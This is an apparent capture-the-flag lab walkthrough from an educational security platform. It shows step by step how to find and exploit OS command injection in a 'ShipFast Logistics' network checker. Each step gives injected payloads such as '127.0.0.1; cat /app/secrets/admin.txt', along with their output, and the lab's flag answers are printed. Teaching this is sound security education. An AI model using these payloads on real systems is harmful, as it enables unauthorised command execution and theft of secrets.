HACKR.GG
hackr.gg — ShipFast Logistics Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

ShipFast Logistics

Command Injection · OS Command Injection
Difficulty
Intermediate
Vuln class
OS Command Injection
Steps
4
// Objective
Identify the injectable feature among three OS-touching inputs, exploit it, and extract two flags from /app/secrets/.
// Tools required
BrowserBurp Suitecurl
// Step-by-step walkthrough
1
Identify the injectable input
ShipFast has three features that interact with the OS: a network connectivity checker, a PDF report generator, and an archive download tool. Test each with a sleep payload to find which passes input to a shell command.
Command / Input
; sleep 3
Measure response time. Only the network checker takes 3+ extra seconds — that's your target.
2
Confirm injection and enumerate
With the network checker confirmed, chain commands to explore the server.
Command / Input
127.0.0.1; id 127.0.0.1; ls /app/secrets/
Output
uid=0(root) gid=0(root) groups=0(root) admin.txt root.txt
3
Extract Flag 1
Read the first flag from admin.txt.
Command / Input
127.0.0.1; cat /app/secrets/admin.txt
Output
HackrGG{sh1pf4st_cmdi_3xf1ltr4t3d}
4
Extract Flag 2
Read the second flag from root.txt.
Command / Input
127.0.0.1; cat /app/secrets/root.txt
Output
HackrGG{sh1pf4st_4dm1n_s3cr3t_l34k3d}
// Flag
Flag value
HackrGG{sh1pf4st_cmdi_3xf1ltr4t3d}
Both flags in /app/secrets/ — admin.txt and root.txt.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute